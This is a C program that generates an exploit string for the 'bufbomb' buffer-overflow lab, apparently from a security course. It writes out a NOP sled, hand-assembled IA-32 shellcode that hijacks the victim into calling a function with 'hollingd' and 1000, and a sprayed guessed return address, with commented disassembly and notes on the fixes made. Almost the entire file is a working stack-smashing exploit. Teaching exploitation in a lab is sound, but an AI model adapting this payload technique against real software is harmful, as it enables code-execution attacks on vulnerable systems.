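#include <errno.h>
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/*
 * Exploit-string generator for the "bufbomb" stack-overflow lab.
 *
 * Writes to stdout a line "rotor" (presumably the user id the lab harness
 * expects) followed by the attack payload: a NOP sled, a short IA-32 code
 * stub, and a guessed return address repeated NUM_RET_COPIES times so that it
 * overwrites the saved return address of the vulnerable frame even when the
 * exact distance to it is not known.
 *
 *   usage: gen <offset>      (decimal, may be negative; added to the base guess)
 *
 * The stub and the absolute addresses below are specific to one 32-bit lab
 * binary; nothing in the payload is portable.
 *
 * Review notes on what changed from the original listing:
 *   - the payload length is sizeof pgm, not strlen(pgm): pgm has no NUL
 *     terminator, so strlen read past the end of the array;
 *   - get_sp() returns its value through an asm output operand instead of
 *     relying on a value left in %eax with no return statement (UB);
 *   - the offset is parsed with strtol and validated, exit() is called with
 *     an argument, and short/failed writes are reported.
 */

/*
 * Return the current stack pointer.  Only printed as a hint when guessing
 * where the overflowed buffer lives in the victim; 0 on architectures
 * without an inline-asm variant here.
 */
unsigned long get_sp(void)
{
    unsigned long sp;
#if defined(__i386__)
    __asm__ volatile("movl %%esp, %0" : "=r"(sp));
#elif defined(__x86_64__)
    __asm__ volatile("movq %%rsp, %0" : "=r"(sp));
#else
    sp = 0; /* no inline asm for this architecture */
#endif
    return sp;
}

/*
 * Attack code.  Per the original author's note it makes bufbomb call
 * credit_account; the disassembly of the stub is given byte group by byte
 * group.  The string argument is NUL-terminated at run time by the stub
 * rather than in the data, which keeps 0x00 out of the payload (presumably
 * because the victim reads its input with a string routine -- confirm
 * against the lab binary).
 */
static const unsigned char pgm[] = {
    /* NOP sled: absorbs imprecision in where the hijacked return lands. */
    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    0x81, 0xc4, 0x70, 0xfe, 0xff, 0xff, /* add  esp, -400   (presumably so the pushes below do not clobber the payload) */
    0xeb, 0x16,                         /* jmp  +0x16       -> the call near the end */
    0x58,                               /* pop  eax         eax = address of "hollingd" (pushed by that call) */
    0x31, 0xc9,                         /* xor  ecx, ecx */
    0x88, 0x48, 0x08,                   /* mov  [eax+8], cl NUL-terminate the string in place */
    0x66, 0x81, 0xc1, 0xe8, 0x03,       /* add  cx, 1000    second argument */
    0x51,                               /* push ecx */
    0x50,                               /* push eax         cdecl: call f("hollingd", 1000) */
    0xb8, 0x18, 0x86, 0x04, 0x08,       /* mov  eax, 0x08048618   function address in the lab binary */
    0xff, 0xd0,                         /* call eax */
    0xc9,                               /* leave */
    0xc3,                               /* ret */
    0xe8, 0xe5, 0xff, 0xff, 0xff,       /* call -27         back to "pop eax"; pushes the address of the bytes below */
    0x68, 0x6f, 0x6c, 0x6c, 0x69, 0x6e, 0x67, 0x64, /* "hollingd" */
    0x01,                               /* placeholder byte, overwritten with 0 by the mov above */
};

/*
 * Guessed address to return to; intended to point into the NOP sled in the
 * victim's overflowed buffer.  It depends on the target binary and its
 * environment (the original carried several earlier guesses as commented-out
 * values), so the command-line offset is added to it for quick re-tries.
 */
static uint32_t target = 0xbfbff17cu;

/* How many copies of the return address follow the code. */
enum { NUM_RET_COPIES = 50 };

/*
 * Write all of buf to fd, retrying on EINTR and short writes.
 * Returns 0 on success, -1 with errno set on failure.
 */
static int write_all(int fd, const void *buf, size_t len)
{
    const unsigned char *p = buf;
    while (len > 0) {
        ssize_t w = write(fd, p, len);
        if (w < 0) {
            if (errno == EINTR)
                continue;
            return -1;
        }
        p += w;
        len -= (size_t)w;
    }
    return 0;
}

/*
 * Entry point: parse the offset, build the payload and emit it on stdout.
 * Diagnostics go to stderr so they never get mixed into the payload stream.
 * Returns EXIT_SUCCESS, or EXIT_FAILURE on a bad argument or write error.
 */
int main(int argc, char **argv)
{
    /* Constant size: 68 bytes of code plus NUM_RET_COPIES 4-byte addresses. */
    unsigned char payload[sizeof pgm + NUM_RET_COPIES * sizeof target];

    fprintf(stderr, "initial sp %lx\n", get_sp());

    if (argc != 2) {
        fprintf(stderr, "Error - need an offset\n");
        return EXIT_FAILURE;
    }

    /* strtol rather than atoi so a mistyped offset is rejected, not silently 0. */
    errno = 0;
    char *end = NULL;
    long offset = strtol(argv[1], &end, 10);
    if (end == argv[1] || *end != '\0' || errno == ERANGE) {
        fprintf(stderr, "Error - offset '%s' is not a decimal integer\n", argv[1]);
        return EXIT_FAILURE;
    }
    target += (uint32_t)offset; /* modular arithmetic: negative offsets wrap as intended */
    fprintf(stderr, "using %" PRIx32 "\n", target);

    memcpy(payload, pgm, sizeof pgm);
    for (size_t i = 0; i < NUM_RET_COPIES; i++)
        memcpy(payload + sizeof pgm + i * sizeof target, &target, sizeof target);

    if (write_all(STDOUT_FILENO, "rotor\n", 6) < 0 ||
        write_all(STDOUT_FILENO, payload, sizeof payload) < 0 ||
        write_all(STDOUT_FILENO, "\n", 1) < 0) {
        perror("write");
        return EXIT_FAILURE;
    }
    return EXIT_SUCCESS;
}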